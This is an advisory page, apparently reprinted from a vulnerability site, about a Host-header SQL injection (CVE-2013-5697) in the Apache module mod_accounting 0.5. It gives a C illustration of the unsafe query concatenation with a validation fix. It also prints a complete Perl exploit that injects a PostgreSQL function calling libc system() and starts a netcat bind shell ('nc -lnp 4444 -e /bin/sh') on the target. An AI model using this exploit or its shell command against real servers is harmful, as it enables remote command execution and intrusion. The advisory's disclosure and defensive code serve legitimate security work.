accounting' module SQL injection vulnerability (CVE

Published: 2013-09-26
Updated: 2013-10-08

Affected systems:
mod_accounting mod_accounting 0.5
Description:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 62677
CVE ID: CVE-2013-5697

mod_accounting is a traffic accounting module for Apache 1.3.x. It records traffic in a database; the supported database types are MySQL and PostgreSQL.

mod_accounting 0.5 has a SQL injection vulnerability in its handling of the Host request header. An attacker can exploit it to corrupt the application and perform unauthorized database operations. The flaw is that the user-supplied HTTP header is used in a query without any filtering: the module uses plain string concatenation to substitute the placeholders in the operator-defined query and then sends the result to the database. The code is in mod_accounting.c.
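The following is an added illustration written for this page; it is not code from mod_accounting. It reconstructs the substitution pattern the description names (a raw header value spliced into a placeholder of an operator-defined INSERT by string concatenation) next to a validation check that refuses to build the query for any Host value that is not a plausible host[:port]. The template text, the "%h" placeholder name and the table layout are assumptions made for the example.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical query template in the style the advisory describes: an
 * operator-defined INSERT in which "%h" stands for the Host header. The
 * placeholder name and the table layout are assumptions for this example. */
#define TEMPLATE "INSERT INTO traffic (host, bytes) VALUES ('%h', 0)"

/* The vulnerable pattern: splice the raw Host header into the first "%h"
 * of the template by plain string concatenation, with no escaping and no
 * validation. Returns a malloc'd query string the caller must free. */
char *expand_query_unsafe(const char *tmpl, const char *host)
{
    const char *p = strstr(tmpl, "%h");
    size_t tlen = strlen(tmpl), hlen = strlen(host);
    char *out;

    if (p == NULL) {                      /* nothing to substitute */
        out = malloc(tlen + 1);
        if (out) memcpy(out, tmpl, tlen + 1);
        return out;
    }
    out = malloc(tlen - 2 + hlen + 1);
    if (out == NULL) return NULL;
    memcpy(out, tmpl, (size_t)(p - tmpl));          /* text before %h */
    memcpy(out + (p - tmpl), host, hlen);           /* header, verbatim */
    strcpy(out + (p - tmpl) + hlen, p + 2);         /* text after %h  */
    return out;
}

/* Allowlist check for a Host header value of the form host[:port]:
 * letters, digits, '.' and '-' in the host part, digits only in the port.
 * Quotes, parentheses, semicolons, spaces and comment markers are all
 * rejected. Bracketed IPv6 literals are deliberately outside this
 * allowlist (a simplification for the example). */
int host_header_is_sane(const char *host)
{
    size_t n = strlen(host), i;
    int in_port = 0;

    if (n == 0 || n > 255) return 0;
    for (i = 0; i < n; i++) {
        unsigned char c = (unsigned char)host[i];
        if (c == ':' && !in_port && i > 0) { in_port = 1; continue; }
        if (in_port) {
            if (!isdigit(c)) return 0;
            continue;
        }
        if (!(isalnum(c) || c == '.' || c == '-')) return 0;
    }
    return host[n - 1] == ':' ? 0 : 1;    /* reject a dangling "host:" */
}

/* Hardened wrapper: refuse to build the query at all for a Host value that
 * is not a plausible hostname, so the record is dropped (or logged) rather
 * than sent to the database with attacker-controlled text inside it. */
char *expand_query_safe(const char *tmpl, const char *host)
{
    if (!host_header_is_sane(host)) return NULL;
    return expand_query_unsafe(tmpl, host);
}

int main(void)
{
    /* Constructed sample values: a normal Host and one carrying a quote */
    const char *samples[] = { "www.example.com:8080", "www.example.com'); --" };
    size_t i;

    for (i = 0; i < 2; i++) {
        char *q = expand_query_unsafe(TEMPLATE, samples[i]);
        char *s = expand_query_safe(TEMPLATE, samples[i]);
        printf("Host: %s\n  unsafe: %s\n  safe:   %s\n", samples[i],
               q ? q : "(null)", s ? s : "rejected");
        free(q);
        free(s);
    }
    return 0;
}
```

Rejecting malformed Host values is the mitigation an operator or module maintainer can apply without changing how the template mechanism works; the proper fix is to pass the header to the database as a bound parameter rather than substituting it into the query text at all.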

<*Source: Wire Ghoul

  Link:
*>

Test method:
--------------------------------------------------------------------------------

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!

#!/usr/bin/perl
# PoC of blind SQL injection in the mod_accounting/0.5 Apache module
# Injection can occur via the Host header
# As the injection occurs in a user defined insert statement a bit of trial and error is required
# Database operations occur asynchronous to page response so timing attacks won't work
# This one is completely blind
# DB can be mysql or postgres, this PoC only covers postgres
# PoC executes netcat to listen on port 4444 (requires dba privileges)
use IO::Socket::INET;

print "#----------------------------------------------#\n";
print "| mod_accounting/0.5 PoC exploit by \ () Wireghoul |\n";
print "|                    |\n";
print "#----------Command execution via SQLi----------#\n";
print "[*] Enumerating blind injection vectors:\n";

my @endings = ("'));", '"));', "));", "');", '");', ");", "';", '";',";");
# These should terminate most insert statements
#my @endings = ( "');" );
my $shell = 'nc -lnp 4444 -e /bin/sh';
my $cnt = 0;
my $content = "CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT; SELECT system('$shell');";
foreach $end (@endings) {
  $cnt++;
  my $sock = IO::Socket::INET->new("$ARGV[0]:$ARGV[1]") or die "Unable to connect to $ARGV[0]:$ARGV[1]: $!\n";
  my $str = "GET / HTTP/1.1\r\nHost: $ARGV[0]$cnt$end $content -- \r\n\r\n"; # from mysql.user into outfile '/tmp/pocpoc$cnt.txt'; -- \r\n\r\n";
  print "[-] Trying $end\n";
  print $sock $str;
  #print "Sent $end\n";
  close ($sock);
}
print "[*] Done, remote server should have executed $shell\n";

Recommendations:
--------------------------------------------------------------------------------
Temporary workaround:

The module is no longer supported; depending on your needs, stop using it.

Vendor patch:

mod_accounting
--------------
The vendor has not yet provided a patch or upgrade. We recommend that users of this software monitor the vendor's home page for the latest version:

Content copyright notice: unless otherwise noted, all articles are original to this site.

Reprints must cite the source: http://www.heiqu.com/2844f320e914cebd6d0ef95069edb516.html